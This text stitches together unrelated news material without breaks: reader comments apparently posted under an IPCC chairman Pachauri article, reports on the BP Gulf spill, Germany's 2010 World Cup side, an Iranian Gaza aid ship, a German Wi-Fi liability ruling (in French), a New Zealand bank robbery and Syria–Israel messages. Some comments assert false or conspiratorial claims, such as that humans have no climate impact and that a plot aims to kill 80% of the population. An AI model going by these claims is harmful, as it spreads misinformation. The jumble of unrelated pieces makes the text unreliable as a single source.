The Himalayan glaciers were n't there only " mistake " , in fact the Himalayan Glaciers were n't a mistake at all the IPCC was informed that there was no chance of the Himalayan glaciers disappearing by a glaciologist , whose name eludes me , he was ignored and the WWF article put into the report .
Dr Pielke had the conclusions of his paper reversed by the IPCC to support the message of doom and gloom , and the shenanigans at WG1 were , and remain , a disgrace to science .
geronimo , East Anglia
The IPCC is rightly perceived by more and more observers as an advocacy organization .
To this end , the IPCC has pushed a " science by consensus " model to policymakers that ignores or minimizes the formidable work of scientists whose results or approaches are not in line with the IPCC 's agenda .
For example , the IPCC has ignored things such as : 1 ) The now infamous " hockeystick " graphic used prominently in one IPCC report - when the " hockeystick " was publicly debunked , it was silently banished to footnotes in future reports , with no acknowledgement of error .
2 ) The reality that all of the IPCC 's computer climate models failed to predict the global decline in temeratures over the last decade .
3 ) The IPCC 's unwillingess to reconcile the existence of previous warming periods prior to the 20th century with the mid-20th century warming period - why were earlier warmings not caused by humans , and why should we accept at only the previous warming was caused by humans ?
4 ) Why is the research ignored clearly showing changes in atmospheric CO2 follow changes in climate , rather than cause changes in climate ?
Atmospheric carbon seems more like a dependent variable , rather than an independent variable .
John W. , Austin , Texas
I 'm surprised to see that we are arguing for minor issues and overlooking the major aspects .
The over population , fossil fuel and aggressive economic growth rates are ruining the planet like hurricane and the object is crystal clear and fully transparent , then what more transparent need to be seen ?
What is the meaning of ' objectivity ' when major objects are being over looked ?
Instead we must look at the environmental things with ' emotions ' not with ' objectivity ' .
I fully support the point of view of Mr. Ben from comment section that emphasis must be given on the implementation part .
We spend years in advocating the right ideas but finally when it comes to implementation , we postpone it for some reason .
To some extent , scepticism and diverse attitudes are alright but extreme attitudes will certainly impair our ability to work together .
Why do not we look at the ultimate task by avoiding the minor tussles ?
We should not forget that our approaches may vary but we all think for the better planet and biodiversity .
Sanjay Singh
Thakur , Indore , India
The IPCC and its chairman , Rajendra Pachauri , have come under unprecedented pressure following a so - called claim that all Himalayan glaciers could melt by 2035 and the controversy over the hacked climate science emails .
I am agreed with Rajendra Pachauri .
IPCC contributes to information availability for climatic models , thereby improving their prediction capability .
Today we are able to gain a better understanding of how the oceans play an important role in the earth 's ' climate memory ' .
Once we become familiar with the natural signals , we will be able to better understand how the human factor correlates with climate .
The IPCC was credited with having settled the debate over whether human activity was causing global warming .
Here , I 'd like to ask what needs to change to enable the IPCC to continue to play a central and positive role in enabling the world 's governments to take the right action against climate change
Engr Salam , Banladesh
An intergovernmental panel was , is and will always be essential to enhance the understanding of and seek solutions to global problems such as climate change .
The undisputed acceptance of such a multinational endeavor of non-biased scientists ' aggregation of global scientific research and opionions based on multidecadal to multicentennial observations and future projections would probably only occur in an ideal non-politicized world of science and science policy .
If the IPCC did not physcially exist in the way it currently does , an appropriate alternative might be a horizontally tiered , internationally aware , digitally connected but academically diverse body of scientists and environmental experts selected on the basis of their independent and objective research and / or climate change impact remediation activities at the grassroots level .
The past IPCC personnel have relied on a similar structure but the alternative , if any , would have to improve upon it to overcome the few claims and notion of the exclusion of certain scientific findings and opinions in their publications and recommendations .
GS , Merced , California , USA Very good article .
I am still dismayed at some of the comments on here still banging on about the medieval warm period etc ( now thought to be a europe focused anomoly ) as Disproof to any ushering of Global warming .
Yes there have been climate changes in the past driven by natural forcings but natural forcings do not explain the warming observed post 1940 of which we can be > 90 % certain is caused by us .
As hinted at in previous comments I think the misunderstanding of scientific findings such as this is due to a lack of education about the language of science .
I.e. Hypothesis are never proved 100 % but are supported or rejected based upon what the data is telling us .
The IPCC outlines inherent uncertainties on the very first page of the report which is more transparent than any legal document will ever be .
There is uncertainty due to the temperature record as pre 1850 thermometers were not widely used .
There is uncertainty with the models because the climate is a chaotic system so high resolution is near impossible without huge computing power ( which we do n't have ) however they have been varified using past data sets .
There is uncertainty due to other factors such as sulphates and their role in the atmosphere .
The biggest uncertainty is whether humanity as a whole will get up off its arse and avoid an extinction crisis or whether it will continue to live in a neoclassical dream world ( ockwell 2008 Sussex university ) until the bubble bursts .
So no , the IPCC can't predict the future for certain but it fully explains the consequences of inaction and the inheret uncertainties of global circulation models etc .
Jethro Gauld , St Austell / Brighton Again the claim of consensus .
The key is in the etymology of the word , Con , to swindle , and sensus , to sense .
I sense an agenda to invoke carbon taxes as tax for a world government body , which would never have been agreed otherwise .
This is the con of the century .
Pachauri claims that he is not deaf , but he still claims that the majority are in agreement .
Judging by the comments on this article , and the growing realisation among the people that this is flawed science , despite the machinations of an orchestrated propaganda campaign , Pachauri is not listening .
Ross , Windsor UK
The problem is that much of the scientific literature is not transparent .
This is even more true of the computer models used to justify the conclusion .
I do n't hear talk of sensitivity , convergence , divergence , algorithms , stability , validation , or even how the selection of data input into the models is determined .
It is hard to trust a group that spouts its assertions without showing the logic , data and process .
Ronald Gardner , Fort Worth , TX Ahhhh , " consensus " again .
Science is not about consensus ; it is about facts supporting hypotheses and theories .
But that appears lost on Dr Pachauri .
His statement that " I would like to start by saying that I am not deaf to those who do not agree with the scientific consensus ... " is a gross affront to those who have historically expressed concern about the IPCC , about AGW being presented as fact , and about the lack of open mindedness in the so - called " debate " on AGW or man -made climate change .
By that very opening statement , he again belittles those who express concerns , whether they be top scientists or taxpaying citizens of the world , and it reaffirms his BELIEF in AGW - as - fact .
It is hard to read anything he writes or listen to anything he says from then on as an honest embrace of true debate about scientific fact or theory .
The IPCC was set up as a political pawn of the UN when the charter was written directing it , the IPCC , to find a " solution " to [ anthropogenic ] global warming .
Twenty years ago , climate science was in its infancy ; it remains a toddler today , relative to many other fields .
The IPCC remains -- largely -- advocacy by scientists masquerading as " scientific assessment , debate and reporting . "
When a small group of scientists can effectively eliminate the work of others , and can promote their own in the reports , then bias creeps in , intentionally or not .
How many of these lead and contributing authors have not emblazoned their CV with their role in the IPCC ?
Eugene , Ohio , USA Pachauri writes that the IPCC was tasked with providing advice not just on climate modelling but on responses and on socioeconomic consequences .
Has it been doing those last two things to date ?
Has it , for instance , generated anything comparable with the economic analyses of Stern and Nordhaus , or studies of geoengineering , or soil sequestration , or ocean nourishment , or harm mitigation ?
If not , why not ?
If so , why do we hear so little about them ?
David Bofinger , Sydney , Australia
This is a very revealing interview but fortunately R K Pachauri does not represent Climate Science .
His statements betray his poor grasp of the historical truth .
Scientific Climatism investigates the laws , patterns , ways , and forms of struggle in climate science , prepares the conditions for a climate revolution , and , ultimately , the establishment of a true climatist state .
Dr. Pachauri is just an opportunistic politician who tried to use this historical issue to get a free ride .
Scientific Climatism will achieve its goals by empowering the climate - aware working classes of proletariat , progressive peasantry and revolutionary intelligentsia .
I predict Dr. Pachauri will not be there when it happens .
Dieter Niederbrunnsulzen , Denver , CO , USA
A new panel modeled on the current one being discussed on climate change is set to be finalized by February dealing with preserving biodiversity and recognizing the importance of biologic services to mankind and the planet .
My question is how come it takes such monumental efforts to recognize what should be obvious to everyone that if we as a species fail to quickly take action in a unified manner the Earth will die .
If recent happenings in the Gulf of Mexico are insufficient hint of what 's to come what exactly will motivate the change we need which is to move to an economy which values life for life sake and takes into count the true meaning of the beautiful Earth so highly refined by countless struggles of all living things large and small over the ages that it defends us all from the harshness of space or the depletion of what sustains us if only we were wise enough to have left it alone .
Thing is we were n't and it's now essential to take action , wise actions with speed to keep the Earth alive and try to do what we can to restore the natural balance of nature .
Dale Lanan , Longmont , Colorado , USA Wbat " consensus " is Pachauri referring to and why does it matter when scientific truth is not a consensus of opinions ?
Mike Hulme of Univ of East Anglia has recently said that only a " few dozen " supported the consensus .
He was talking of the pivotal 9th chapter of the WGI contribution , written by 53 people most of whom were in a network of people , mostly dependent on climate models for their employment , who had worked together .
That pivotal chapter provided no substantial evidence for significant manmade climate change and yet Pachauri carries on as if such evidence was proven .
His position and the IPCC's as a whole , is untenable because climate models are inaccurate and cannot model natural climate forces , and that makes it impossible to determine if there is any human influence whatsoever .
John McLean , Melbourne , Australia
Well , we can keep waiting for IPCC to help save nature and our planet earth .
Or we can start doing our bit in our own daily lives by being more responsible .
Elpis is an online community focussed on responsible living and sustainable growth .
The tagline ( Think . Connect .
Act ) says it all .
Get the unbiased facts on environment , sustainability , climate change , biodiversity , clean energy , green living and so on from the experts .
Network and collaborate with friends , track thought leaders , and make new links with people who share a common interest in a zero carbon , responsible lifestyle .
Measure your carbon footprint using Elpis ' unique global carbon calculator .
Reduce your footprint in a pragmatic manner by creating a personalized reduction plan .
Become carbon neutral by buying carbon offsets from a carefully selected portfolio including biomass , geothermal , solar , wind , and methane capture projects .
Use the Elpis Collaboration Platform to set up petitions , volunteering projects or fundraising initiatives for your favourite causes .
Buy eco friendly products and services such as solar panels , home energy solutions , energy efficient cars & appliances , green electricity , eco fashion from the Elpis online shop .
Create and implement community development plans to tackle issues such as energy , livelihoods , food , resources , health , education etc .
And so on .
Elpis is truly about social networking with a purpose .
Mario , London Dr Pachauri is absolutely correct , both in asseting that the IPCC plays a vital role and that at the same time it , or the process it must operate under is not perfect .
In the scientific area its forced reliance on peer - reviewed papers , rather than specifically commissioned research , effectively ignores the file - drawer effect : only ' significant ' i.e. positive study outcomes ever even make it as far as peer review .
Papers showing no ' significant result ' , if written and submitted at all , are weeded out and rejected by the journal publishers before the peer review stage .
Secondly , as he acknowledges , there is a mountain of very important non-peer reviewed ( or at least reviewed using different criteria from the ' scientific method ' ) in particular in the social and behavioural sciences and economics .
And given that ' response measures ' also form part of the brief to IPCC , these can not be ignored .
In fact the difficulty is as always how to harmonize the findings and methodology of one , the ' scientific method ' , with the other , both in terms of interpretation and communication .
And that is not a problem unique to the IPCC but to the whole of science , hard and ' soft ' .
The fallacious and in particular prevalent idea in ' science ' that the answer is simply education not only is not helpful but illustrates the gulf between ' science ' and the real world , the understanding of the reasons or motives for human behaviour .
I and many others have been educated a long time ago and am / are totally convinced that smoking is bad for me / us .
And still I / we do it .
Ironically it is really the response to the science that is under attack , not the science itself .
But as the science is presented as ' near certainty ' ( never mind we , scientists , knowing that does n't exist in our method as wel as the problem with unreported studies ) and the response is a " rational " almost linear extrapolation from the science , ignoring the all - important ' typical human factors ' , it is unsurprising that the fount of this , the science , is being pulled to pieces .
And what do they find ?
Uncertainty .
Absolutely correct .
We know that .
Our method is based on that .
The only problem is with how we determine the response patterns and factors .
And ' science ' has no answer to that .
That is up to the " soft " sciences and the IPCC ....
Paul van Poppelen , Gibsons , BC , Canada
There are two issues here .
One is of science .
The other is of policy .
They are very different .
Science is a process , not a fact .
Nothing in science can ever be proven .
But contrary to Dr. Becker 's amusing claim , it is rather far - fetched to say that anything as well - supported as AGW has been " decisively falsified " -- especially using such simplistic arguments as " some temperature variations are natural , therefore all temperature variations are harmless . "
Nonetheless , there are indeed some deep arguments within climatology , some good questions , some conclusions that are tentative .
The science has advanced dramatically in the last 10 years and it will continue to improve , but we will never be completely sure of anything .
That is the nature of science .
The second issue is that of policy .
We know that there are risks : we know that adding CO_2 to the atmosphere in the quantities we have been WILL cause climate change , and we 're also observing climate change , and we have some theories and some models showing that there may potentially be great harm .
OF COURSE we 're operating under uncertainty -- we always do -- but we know that there 's a decent chance that we 're in serious trouble .
The potential of harm from moving away from fossil fuels is minor , and the potential of harm from maintaining our addiction is enormous .
Anyone setting policy should not be waiting for a definite answer from science , but should be aggressively working towards making sure that the world remains habitable and politically and ecologically viable , using the best of our current knowledge .
Once we realise that policy and science are not the same : there are other reasons to stop burning fossil fuels .
The millions of deaths due to traffic accidents and pollution and terrorism and oil spills and carcinogens and poverty and whatnot ought to be reason enough to have called an end to this charade years ago .
Even if there were no possibility of AGW , there is no question that fossil fuels are terribly harmful .
So while there may be debate amongst educated scientists on exactly what 's going on , why is there debate on what POLICY we should adopt ?
Ben , Colorado , USA David wrote : " Many skeptics , including myself , have made detailed technical comments during expert reviews , and we have always been ignored . "
But those technical comments were published in the IPCC reports , so " ignored " may be in the eye of the beholder .
Bob Maginnis , Astoria Oregon USA
It would be quite prudent to include self - proclaimed skeptics in the peer - review process for each Assessment Report .
Data , science , and theories that refute the claims / analysis of the ARs need at least be addressed .
Brandon , Kodiak Alaska , USA I wish the libertarians and carbon lobby groups could be subject to a fraction of the scrutiny to that of the IPCC .
Then the public would realise the real conspiracy , that we are faced with an army of politically motivated , and media savvy misinformers as opposed to the IPCC who are composed of genuine people interested in communicating the truth .
In fact the only valid criticism of the IPCC is that is can be leaned upon by governments to be far too Conservative and under - emphasise the scale of the problem .
This is compounded by the fact that by the time the IPCC reports are published , the data is way out of date .
Stephen , Sandhurst
It is very unfortunate that Mr Pachauri and many on the ' consensus ' side play the card of ' crisis communication ' .
Admitting 'a mistake ' and claiming to be open to scrutiny so the train can move on , pretending nothing happened while prominent climate scientists like Mike Hulme already left IPCC because in 2001 because it became too much politicized .
As for the IPCC meeting in Amsterdam , the most central figures in the ' climategate ' - debate were not even invited : McIntyre and Mc Kittrick who published in Geophysical Research Letters on the flaws in a major graph used by IPCC in 2001 ( the famous hockeystick ) , while a Dutch food sociologist , having nothing to do with the climate debate , was invited ...
MM have been under attack , predominantly by using ad hominem arguments , but not seriously engaging their points of criticism , and there are no signs they will .
As for the ' one mistake ' in the AR4 : also climate scientist Hans von Storch , IPCC economist RIchard Tol and many more scientists can tell this is a creative represantation of the truth .
There 's many more and they are deliberate , al on the alarmist side .
As long as this Pachaurism is not eradicated , climatescience loses more and more credibility in the public mind , and taking science as a whole with it .
There is only one solution that will save science .
Pachauri has to go , so he can spend more time writing porn novels , and a serious scientist has to take over .
Rypke Zeilmaker , Amsterdam
How can one be on one side of a consensus ?
Christopher J Burton , Oakville , Canada
We cannot allow these Eugenicists to push this Man Made Climate Change scam any longer .
It has been proven time and time again that humans have no impact at all .
This is just a scheme to centralise power in the form of a Global Government .
Once this is established they plan to eliminate 80 % of the worlds population .
What I am saying here sounds far fetched but I strongly encourage anyone reading this to look these statements up .
You will be both shocked and disgusted with what you find .
Jack , Gateshead , England Here 's that consensus again ....
John , Liverpool
It remains to be seen what Dr. Pachauri means by welcoming debate .
Many skeptics , including myself , have made detailed technical comments during expert reviews , and we have always been ignored .
To date the IPCC assessments have in fact been one - sided advocacy documents , not true assessments of the science .
The scientific debate is real and the IPCC must present it as it is .
The world will be watching to see how this is done .
David Wojick , Washington DC , USA
To say there is a " consensus " on global warming is dishonest or delusional , probably both .
There is ample peer reviewed literature that decisively falsifies the human caused warming theory .
There was a medieval warm period , Roman warm period , and Little Ice Age , for instance .
The changes in temperature ( up and down ) in the last 150 years are entirely natural .
I am a serious scientists ; the IPCC and AGW are embarrassments to the search for truth championed by real science .
David Becker , Rochester , MI , USA
The IPCC is a political body representing political interests and it is absurd to insist that it represents a consensus of scientific opinion .
Given the current state of climate science , the IPCC is a pointless waste of resources and should be disbanded .
Philip , London Kevin , Fife - that is correct , one mistake has been pinned on the IPCC ( 2 if you include the mistake that was the fault of the Dutch government ) .
The other allegations of errors made on assorted websites and by a few journalists were all baseless .
As for the non-peer reviewed papers , I have to ask if you have even read the article above as it clearly states " there are areas such as the ones related to response measures where lots of important and relevant information is not in scientific peer - reviewed literature , but published by very respected institutions .. " .
The rules as to when peer reviewed is to be used and when so - called ' grey ' literature is allowed are very clear , and the IPCC has never violated those rules .
Paul A , London
It 's a classical case of " too little , too late " ... had Dr Pachauri written the above just before the publication of AR4 , or in response to the ( correct ) claims about the Himalayan glaciers error , the IPCC would have been by now a much , much stronger organisation .
An overall review of his work has to take into account the extraordinary lack of judgment shown until today .
Maurizio Morabito , London , UK AR4 ' One mistake ' ?
And the rest !
Oh and what about the huge swathes of it that are based on non peer reviewed papers .
Far from being the ' Gold Standard ' , its more like a very tarnished ' Brass Standard .
Pachauri needs to go , he as the head bears ultimate responsibility , not to mention his obvious conflicts of interest .
Time for a fresh start .
Kevin , Fife IPCC is wealth nations club , they know what they want , Pachauri is Ginny pig , ofcourse any report errors will be there , so what ?
there is no system without an error .
Prasanna , Brussels
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
President Obama is back in the Gulf of Mexico for a two - day tour followed by a national prime - time TV address Tuesday , June 15 , on the worst ecological disaster in U.S. history .
The president ’s tour and speech add to the growing pressure on British Petroleum to speed up its payments to crisis victims and to increase what are seen as inadequate efforts thus far to curtail the now clearly unprecedented amount of oil fouling both the surface and undersea waters of the Gulf of Mexico .
The White House is also calling for establishment of a third party to take control of administration of the billions of dollars BP must pay out for damages , taking control away from the company itself .
The 42,000 claims filed thus far are from not only shrimpers , oystermen and seafood processors but from hotels , restaurants , machine shops , tour companies and many others .
A seafood restaurant owner in St. Bernard Parish told the World by phone June 14 that no -one in the BP claims office he has been calling is answering the phone .
He said small businessmen he knows who do get through get adjusters on the phone who “ have not even heard of the towns they are calling from . ”
The government has revised its estimates of the size of the spill , which were from 5,000 to 19,000 barrels daily , to 20,000 to 40,000 barrels daily .
Coast Guard Admiral Thad Allen said , however , that “ a true measure of the spill wo n’t be known until August ” which is the earliest that BP says it will be able to stop the leak with a relief well .
Using the government ’s latest , but admittedly not final estimates , 90 million gallons have spilled into the Gulf since the BP rig exploded , sank and killed 11 workers in April .
In addition to Louisiana , oil is now coming onshore in Mississippi , Alabama and Florida .
In an about face , Republican House Minority Leader John Boehner said he now favors lifting the liability cap on BP but says he wants the cap “ redefined . ”
Boehner earlier seemed to favor U.S. taxpayers kicking in to pay for the oil spill but said this weekend “ not a dime ” of public funds should be used .
Democrats are calling on him now to back a bill they support which would lift that cap .
In a related development Climate Progress Reports that days after Utah ’s Republican governor called for new tax breaks for oil companies to spur additional investment in domestic oil production , Chevron discovered a leaking pipeline that was spewing 50 gallons of crude oil per minute into Red Butte Creek in Salt Lake City .
By the time the leak was capped 21,000 gallons of oil had spilled out , closing the city ’s largest park .
Photo : In Gulf Shores , Ala. , waitresses hear Alabama National Guard members explain the procedures for filing an oil spill claim against BP , June 11 .
Dave Martin/AP
Ten reasons Germany will win the World Cup !
Germany 's stylish demolition of Australia on Sunday has made the world sit up and take notice .
2010 World Cup
The best sexy fan pictures !
These gorgeous Greek fans did n't let their team 's performance get them down .
Foto : Getty Images 1 / 4 vorheriges Element nächstes Element
There has been plenty of praise heaped on the team from worldwide media :
" Germany were as imposing as ever , but with a style of football which had n’t been seen for many years , " said Spanish newspaper ' Sport ' .
Italy's ' Corriere della Sera ' : “ The new Germany blends imagination with power . ”
' Ekstra Bladet ' from Denmark : " So far the German way has been the ability to succeed without beauty .
What could it be like now if it was also fun to watch the Germans ? ”
The 4 - 0 against Australia was not just a victory , it was a demonstration of the new German way .
No more lumber football , but attractive combination football !
Jogi , how have you made it possible for your team to suddenly be playing fantasy football ?
Löw : " It ’s the result of hard work in the past five weeks . "
BILD explains the ten reasons why Germany could win the World Cup :
• Perfect preparation !
The German coach travelled to South Africa three times before the World Cup began .
The grass on the training fields is exactly like it is in the stadiums .
Even the journey from the team hotel to the airport was planned meticulously .
• Loew records training sessions in 3D quality , which he analyses later in group discussions .
• In the very first training camp in Sicily , he pulled the television plug from the socket - no distractions !
He is never in bed before midnight , preferring instead to discuss matters with assistant coaches Hansi Flick and Andreas Köpke , and team manager Oliver Bierhoff .
• He focuses on total fitness .
Chief fitness coach Shad Forsythe moved to Germany a year ago from the US , and built close contact with the clubs .
• Löw works with the players individually .
The most hated exercise is the sideways crouch jumps over an elastic band , which are increased in intensity .
• In training in South Tyrol , Löw divided the pitch in into small squares , so the whole training field was used – as coach Louis van Gaal does at Bayern .
" We play Louis van Löw ! " joked Bayern revelation Thomas Müller .
• Löw ’s Bayern backbone of Philipp Lahm , Bastian Schweinsteiger , Holger Badstuber , Thomas Müller and Miroslav Klose ooze self - confidence and know the system works , with plenty of possession , off the ball movement and lightning fast attacks from the team .
There was also a foundation of five Bayern players in 1974 when Germany were world champions .
Löw said : " Louis van Gaal values tactics and systems as much as I do .
You can only play good football with a good team layout . "
• The deep passes from Mesut Özil , Lukas Podolski or Schweini are scrutinised a thousand times .
As are the double passes : Özil to Müller , Özil to Klose , Poldi to Klose .
Löw called it " tack - tack " – giving and going .
• For his super talent Mesut Özil , he also brought Werder Bremen ’s fitness coach Benjamin Kugel to the World Cup .
Özil ran over 9 km against Australia until his substitution after 74 minutes , a remarkable figure for a playmaker .
• Löw focuses on group dynamics with his young stars !
Together with Bierhoff , he distributed black , red and gold bracelets to players and coaches , to stress to all – we are a team !
But can Jogi make it continue for the next four weeks or so ?
Related news
Germany captain Philipp Lahm revealed he has been inspired by Lothar Matthaeus , and wants to emulate the World Cup heroes of 1990 .
Franz Beckenbauer said he is impressed with Germany 's start to the World Cup : The Kaiser claimed : Mesut Oezil passes it like Messi !
In other words , it is wrong to limit deep - water drilling opportunities to companies that can afford to pay restitution if they screw up .
Because there will be no more screwing up .
We have decided .
Representative Joe Barton , a Republican of Texas , has a crush on the oil industry of a size that ’s seldom been equaled outside of “ High School Musical . ”
Last year in a committee hearing , Barton attempted to show up Energy Secretary Steven Chu by suddenly asking him to explain , as briefly as possible , “ How did all the oil and gas get to Alaska and under the Arctic ocean ? ”
While the startled Chu started to talk about shifting tectonic plates , Barton beamed smugly .
“ I seem to have baffled the Energy Sec with basic question : where does oil come from ? ” he twittered .
This week , Barton became the star of another hearing , which was convened to grill Tony Hayward , the chief executive of BP .
The rosy - cheeked Englishman had the kind of dopey sullenness you might find in an underachieving student at the Hogwarts detention room .
But Barton seemed smitten , and he apologized to BP for the president ’s “ shakedown ” of the company for a $ 20 billion fund to compensate the people of the gulf for the effects of the spill .
This is perhaps not the stupidest remark any elected official has ever blurted out , but possibly the dumbest that ever came in the form of a prepared statement .
Every Democrat in Washington did the happy dance .
The party could not point out too often that if the Republicans took control of the House , Barton would be leader of the House energy committee .
The House Republican leadership was terrified that people would sense Barton was n’t the only member of the party who loathed the president ’s BP coup .
Using all the strong - arm tactics they failed to employ with the congressman who yelled “ You lie ! ” during the State of the Union address , they pried a sort of retraction out of Barton .
The first effort fell short .
But , finally , the office of the minority leader , John Boehner , sent forth a version in which Barton apologized for the apology , as well as for the use of the term “ shakedown . ”
Which is kind of funny because “ shakedown ” is exactly the word that the Republican Study Committee used to denounce Obama ’s deal right after it was announced .
But the Republican leadership has a dream that they never agreed with anything that Barton said .
They hatehatehate BP .
Also , they are hoping that Miley Cyrus moves to their hometown and becomes their best friend .
Tehran , Iran ( CNN ) --
Iran will not send a ship carrying humanitarian aid to Gaza as it had planned to do on Thursday , according to a report from the official news agency of Iran .
The Islamic Republic News Agency quoted Hossein Sheikholeslam , secretary - general of the International Conference for the Support of the Palestinian Intifada , as saying : " The Iranian ship carrying humanitarian aid will not go to Gaza . "
IRNA said that Sheikholeslam told reporters in the northern city of Rasht that the ship had originally been scheduled to depart for Gaza on Thursday , but that its departure was postponed until Sunday because of restrictions imposed by Israel .
He added that officials then decided instead to cancel the trip altogether , shipping to Gaza the goods by other means , IRNA said .
" The Zionist regime has made helping the people of Gaza , who are under siege , a political issue and we do not wish to politicize this kind of humanitarian aid because first and foremost we want the siege of Gaza to be broken , " he said , according to the news agency .
" The Zionist regime has sent a letter to the U.N. saying that the presence of Iranian and Lebanese ships in the Gaza area will be considered a declaration of war on that regime and it will react to it . "
He added : " In order to deprive the Zionist regime of any excuse , the aid collected for the oppressed people of Gaza will be delivered to them by other means without mentioning the name of Iran . "
In a posting on the Israel Defense Forces website , the chief of the general staff said Israel has " a natural right to inspect and to prevent the flow of weapons into the Gaza Strip . "
" If anyone is bothered by the situation in the Gaza Strip and wants to transfer medical supplies there , they can respect our guidelines and go through to the Ashdod port , " Lt. Gen. Gabi Ashkenazi said Tuesday , according to the IDF .
" We will inspect them , and if we can we will transfer them in . "
Ashkenazi added , " It is important that we maintain this right and we cannot let the Gaza Strip turn into an Iranian port . "
Israeli Prime Minister Benjamin Netanyahu announced this month Israel 's plans to ease its blockade of Gaza , a step commended by major powers and brushed off by Palestinian leaders .
Palestinian officials said the steps were an improvement but called for the blockade to be completely lifted and the Israeli occupation ended .
Israel 's announcement came three weeks after ships in Israel 's naval blockade sparred on May 31 with a flotilla of aid ships heading to Gaza .
Israel 's military stopped the flotilla , killing nine Turkish activists on one of the ships in the incident , which drew international condemnation .
Israel said its troops were attacked with knives , metal poles and other objects on one of the boats ; the boat 's passengers said they were fired upon without provocation .
CNN 's Shirzad Bozorgmehr contributed to this story from Tehran .
La Cour fédérale allemande , la plus haute juridiction du pays , a tranché : les internautes sont tenus , sous peine d'amende , de sécuriser l'accès à leur réseau Wi -Fi par un mot de passe pour éviter qu'il ne soit utilisé par un tiers pour télécharger illégalement .
Dans une décision rendue mardi , mais dont les motivations détaillées n'ont pas encore été publiées , la Cour estime que les titulaires d'un accès à Internet sont responsables de sa sécurisation , et doivent donc protéger leur accès Wi-Fi par un mot de passe " suffisamment long , sûr et personnel " et qui ne doit pas être le mot de passe fourni par défaut par le fournisseur d'accès à Internet .
Si leur réseau est utilisé par un tiers pour télécharger illégalement , ils encourent une amende de 100 euros maximum .
Cette décision est la conséquence d'une saisie de la justice allemande par un musicien , qui avait porté plainte contre un internaute , l'accusant d'avoir téléchargé une de ses œuvres et de l'avoir ensuite partagée sur des réseaux d'échange de fichiers .
Or , l'internaute a pu prouver qu'il était en vacances loin de son domicile au moment des faits qui lui étaient reprochés .
La Cour a cependant estimé qu'il était partiellement responsable pour ne pas avoir protégé sa connexion Wi -Fi par un mot de passe , permettant à des tiers d'utiliser son réseau .
UNE APPROCHE PARALLÈLE À CELLE DE LA HADOPI
Une fois la Hadopi entrée en activité , un internaute français pourra également être mis en cause pour ne pas avoir sécurisé sa connexion Wi -Fi .
Si la Haute Autorité ne sanctionne en effet pas le téléchargement illégal en tant que tel ; elle punit le " défaut de sécurisation d'un accès à Internet " .
Il est en effet difficile de prouver qu'un internaute est bien l'auteur d'un téléchargement illégal , notamment parce qu'un réseau Wi -Fi peut être piraté .
Les internautes qui recevront les avertissements de la Hadopi et qui souhaiteraient prouver leur bonne foi pourront installer un " logiciel de sécurisation " , agréé par la Haute Autorité .
Le cahier des charges et a fortiori la liste de ces logiciels ne sont pas encore connus .
L'Allemagne a donc choisi une option plus simple ; les sanctions encourues sont également moins lourdes , puisque dans les cas les plus graves , la Hadopi pourra transmettre le dossier à la justice , où le téléchargeur risquera prison avec sursis et d'importantes amendes .
LES RÉSEAUX OUVERTS DE FAIT ILLÉGAUX
La décision de la Courrendrait de fait illégaux les réseaux associatifs ouverts en Allemagne .
Les cafés ou restaurants qui proposent des accès à Internet Wi -Fi à leurs clients pourraient également être touchés par cette décision , dont la mise en application n'est pas encore claire .
A l'inverse , le jugement pourrait donner des idées aux internautes allemands qui souhaitent télécharger illégalement : en ne protégeant pas correctement leur réseau Wi -Fi , ils pourraient être tentés d'échapper à la sanction pour téléchargement , et espérer la remplacer par une amende peu élevée .
Un pari risqué : outre la tentative de dissimulation de preuves , ils pourraient également écoper d'une amende bien plus salée que prévu .
Le cas jugé par la Cour fédérale ne portait en effet que sur un seul morceau de musique ; dans les cas de téléchargements massifs , la sanction financière pourrait être beaucoup plus élevée , note le Spiegel .
Le Monde avec AP
Slideshow :
The gulf coast oil spill
By Andre Damon and C. W. Rogers
19 May 2010
During the week of May 9 - 15 , WSWS reporters Andre Damon and C. W. Rogers covered the Deepwater Horizon oil spill from Venice , Louisiana , where they spoke to dozens of fishermen , boat captains , observers and experts .
The week before , Andre Damon attended the funeral of Karl Kleppinger , one of the workers killed on the Deepwater Horizon , in Natchez , Mississippi .
Click to begin slideshow
A bare - faced bank robber stood in line behind other customers before holding up a teller and making off with cash .
The man walked into the BNZ in Tawa's Oxford St about 3.30 pm yesterday , wearing a distinctive pair of yellow waterproof pants .
Detective Senior Sergeant Mike
Oxnam said the young man patiently waited in line behind other customers , then once at the head of the queue , told the woman teller he was armed before demanding money .
The teller remained clear - headed , handing over cash , and the man quickly left the building .
Nobody was hurt and though there were five customers in the bank , only one noticed what was happening , Mr Oxnam said .
The robber was possibly a light - skinned Maori , in his late teens or early 20s , and was wearing a black cap , and a black hooded sweatshirt with red writing on it .
He was last seen heading south down Oxford St .
Given the fact that he did not try to mask his face , Mr Oxnam questioned his experience as a bank robber .
Police said he may be armed and should not be approached .
Anyone who recognises the man should contact Porirua police urgently on ( 04 ) 238-1401 .
Syrian President Bashar Assad says his Russian counterpart , Dmitry Medvedev , relayed a message from President Shimon Peres last week , that Israel was willing to withdraw from the Golan Heights in exchange for Syria cutting its ties with Iran and the " resistance movements " .
Assad made the remark in an interview published Tuesday in Lebanese newspaper as - Safir .
Message to Israel Assad advisor :
There 's always a chance of war Roee Nahmias Dr. Bouthaina Shaaban tells Hezbollah TV station that Syria is not interested in Israeli threats , calming messages Assad advisor :
There 's always a chance of war
asked Medvedev to relay a message to Assad , with who the Russian leader met two days later .
On the backdrop of the recent tensions and the calming messages , Assad replied : " Our answer is clear .
Reality proves that Israel is not working for peace , so talks will not help . "
Assad and Medvedev. Peres ' message relayed ( Photo : Reuters )
Peres told Medvedev , " We are reaching our hand out for peace with Syria , but peace cannot exist without a basic condition :
You cannot reach a hand out for peace while continuing to support terror groups . "
He explained that " Israel has no other interpretation for the transfer of arms from Syria to Hezbollah .
The transfer of long - range , precise missiles to the organization is an incitement to war . "
Not revealing cards
Assad was asked in the interview whether Syria would join a war in the event of an Israeli attack on Lebanon .
" I believe that the Israelis hope to hear the answer to this question , but I wo n't fulfill their wish , " the Syrian president replied .
" These are military matters which we shall not reveal .
We shall not reveal our cards or plans . "
He also addressed claims that his country transferred Scud missiles to Hezbollah .
" All the public sights of war and peace are imaginary .
I say we must worry if the Israelis are silent , not if they talk .
The threats you hear and the Scud missiles they talk about have nothing to do with the conditions of war and the possibility that it will take place , just like all the calm attempts which follow do not mean that the chances of peace have grown stronger . "
" We do n't believe the Israelis , " Assad added .
" We act based on the assumption that we must be prepared for war and peace at any minute .
